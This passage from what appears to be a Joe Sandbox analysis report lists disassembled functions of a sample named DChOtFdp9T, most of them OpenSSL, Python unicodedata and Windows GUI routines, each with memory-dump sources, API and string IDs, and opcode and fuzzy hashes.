                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_write_internal
                                                                                                                                                                                                                            • API String ID: 1552677711-2859347552
                                                                                                                                                                                                                            • Opcode ID: c3fa4bf3e55082e9533c262fd1dcaf2578f794ad844a0654a0191f213e81ec7f
                                                                                                                                                                                                                            • Instruction ID: cae6846dbfd9a7487b88f50668183c9643bd0529ad09188ac226a4af96852c03
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3fa4bf3e55082e9533c262fd1dcaf2578f794ad844a0654a0191f213e81ec7f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F415C31B0864286F714AB15E461AE96351EF84B94F944231EA7DC77EEDE3CE8418B44
                                                                                                                                                                                                                            Function 00007FFDFABD24B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Module_$DeallocObjectObject_$ConstantFromSpecStringTrackTypeType_
                                                                                                                                                                                                                            • String ID: 15.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
                                                                                                                                                                                                                            • API String ID: 2663085338-4141011787
                                                                                                                                                                                                                            • Opcode ID: 9245d99d18ba6a28b06419a6239545a4791f8e2f4c0c976115bc78d49b54a1c7
                                                                                                                                                                                                                            • Instruction ID: e907cace200bb6070afdfca2df25ac00dd8eda0faf0e3c94b44f9abff4d42608
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9245d99d18ba6a28b06419a6239545a4791f8e2f4c0c976115bc78d49b54a1c7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21312835F0CA8381FB1D5B21A834E7862A8AF49B99FD845B5CD2E466DDDF7CE8408300
                                                                                                                                                                                                                            Function 00007FFDFF267B90 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$D_get_sizeDigestFinal_exR_set_debugX_copy_exX_freeX_get0_mdX_new
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_handshake_hash
                                                                                                                                                                                                                            • API String ID: 474506514-3232504857
                                                                                                                                                                                                                            • Opcode ID: 02ea5abfbf2f53a38f1623888cff3a3964d36582bd24de410d95363bd071f676
                                                                                                                                                                                                                            • Instruction ID: cba2fafd8b20a4db41ec6f9e60f2ebf068c4c92f25bef28578ec8d3b0984bec3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02ea5abfbf2f53a38f1623888cff3a3964d36582bd24de410d95363bd071f676
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37214A11B0964246E718AA66B971EBA9750AF85BD0F944231EE3DC77CEED3CE4424740
                                                                                                                                                                                                                            Function 00007FFDFF274E80 Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: D_freeD_newD_push_D_push_uintD_to_paramM_freeN_freeN_get_rfc3526_prime_8192X_freeX_new_from_nameY_fromdataY_fromdata_init
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2253699700-0
                                                                                                                                                                                                                            • Opcode ID: a066f7179f1c3debe826554df67d5efe101cb3d5ed3ef233f730f73936c5b527
                                                                                                                                                                                                                            • Instruction ID: 821d615d55fe224f405aae35ce6946167b49dc64447af18825eec5aeb5c4e47e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a066f7179f1c3debe826554df67d5efe101cb3d5ed3ef233f730f73936c5b527
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96418012F0A68385FB18AA16A4B5EFC1390EF45B84F544231EE7DC77DAEE6DE5028201
                                                                                                                                                                                                                            Function 00007FFDFF28EE50 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions.c$final_key_share
                                                                                                                                                                                                                            • API String ID: 476316267-2690623152
                                                                                                                                                                                                                            • Opcode ID: 22cfacbaefdc4d6a829318ddcb69a1e7ca535d6991d1818d79d628081807dc1d
                                                                                                                                                                                                                            • Instruction ID: 195c0ce921750c61dbe4b9ebf170039752e3b15a9c4380c1af3e81e80c1935eb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22cfacbaefdc4d6a829318ddcb69a1e7ca535d6991d1818d79d628081807dc1d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2971AF31B1868289F7609A25D424BBD2790EB41788F588636DE7CC66CEDF7CE685CB10
                                                                                                                                                                                                                            Function 00007FFDFF27ECB0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indent$O_printf$O_puts
                                                                                                                                                                                                                            • String ID: No Ticket$ticket$ticket_age_add=%u$ticket_lifetime_hint=%u$ticket_nonce
                                                                                                                                                                                                                            • API String ID: 1353156648-4248733311
                                                                                                                                                                                                                            • Opcode ID: ced2c8895104ab2439ec8ce99c64180e1287945df143a2ba8fe3e7138fc0a0ae
                                                                                                                                                                                                                            • Instruction ID: 58dacb59186ea2a730e177adcaebff7d827f9d0da0d502bcfd3fbaba24ea28e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ced2c8895104ab2439ec8ce99c64180e1287945df143a2ba8fe3e7138fc0a0ae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E951F123B08BE146E7508B29A464AA97B91EB417A4F444731DEBCC7BD9DF7CD142C710
                                                                                                                                                                                                                            Function 00007FFDFABD11B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
                                                                                                                                                                                                                            • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                            • API String ID: 1723213316-3528878251
                                                                                                                                                                                                                            • Opcode ID: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                            • Instruction ID: f77f27c4dd826f1f9cd267b67a09f9a855510bdb2e9cd7d8bbe526c2d72799b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85518D61B0C65381FB6C8B26B971E796294AF12BC0F8451B5DD6E87ACEDF3EE4019700
                                                                                                                                                                                                                            Function 00007FFDFABD44E4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: $%04X$a unicode character$argument$decomposition
                                                                                                                                                                                                                            • API String ID: 1318908108-4056541097
                                                                                                                                                                                                                            • Opcode ID: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                            • Instruction ID: 46c67e066b37fb3041c394868d9a64166fbf79f425844642f3b74156b2f018d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F41C8B1B08A8291EB288B15E874BB963A1FF45B94FC446B5C97E076D8DF3CD555C300
                                                                                                                                                                                                                            Function 00007FFDFF241DED Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$R_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_key_update
                                                                                                                                                                                                                            • API String ID: 3782669924-3423994419
                                                                                                                                                                                                                            • Opcode ID: 11fcd71127f32fc0120f9ec122519fe0adce38d503969d654171b5d3c3a1a353
                                                                                                                                                                                                                            • Instruction ID: e6c5f62506b5edf5676be4d0f67ff8ca670d73937535be4f3c7597b9443cbf8c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11fcd71127f32fc0120f9ec122519fe0adce38d503969d654171b5d3c3a1a353
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC314720F0868256FB44AB25D861BFD6350AF85344F948331EA3CC66EFDF6CE9868700
                                                                                                                                                                                                                            Function 00007FFDFF241CF3 Relevance: 18.1, APIs: 12, Instructions: 125COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: T_free$P_resp_count$E_freeL_sk_new_nullP_freeP_get1_ext_d2iP_resp_get0P_response_get1_basicR_newR_set_debugR_set_errorX509_get_ext_d2id2i_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2948080378-0
                                                                                                                                                                                                                            • Opcode ID: 0850d99d69657a2f865fe3b8fcc66b9f07ff529173811c8e845e1ad28d6b2e1d
                                                                                                                                                                                                                            • Instruction ID: e22cac48941f7b40d5ab7b573c49ef40da170c5cc7a43bf619aae38a1d74d97d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0850d99d69657a2f865fe3b8fcc66b9f07ff529173811c8e845e1ad28d6b2e1d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B419F11B0D75242EB18ABA65061BAA7790AF45BC4F840234EF7DCBBCAEE7DF4419300
                                                                                                                                                                                                                            Function 00007FF6029920F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                            • Opcode ID: d69fa0a64b1acce0cbb859f9003b76fd80cc3f6517c3d01b1df05ea35beaa245
                                                                                                                                                                                                                            • Instruction ID: 202efe7618127287b851023a33ab4f795552d859f98d7b1add110bcf26f26c49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d69fa0a64b1acce0cbb859f9003b76fd80cc3f6517c3d01b1df05ea35beaa245
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68510626618BA186D6349F26E4181BABBA1FB98B65F104131EFCE83785DF7CD085DB10
                                                                                                                                                                                                                            Function 00007FFDFF255FF0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_free$F_parse_listL_sk_new_nullL_sk_numR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_ciph.c$set_ciphersuites
                                                                                                                                                                                                                            • API String ID: 1606736437-2539045550
                                                                                                                                                                                                                            • Opcode ID: 503bce6c2c57985b77625ead039adc51ab1d0390028000737676f149e22b8228
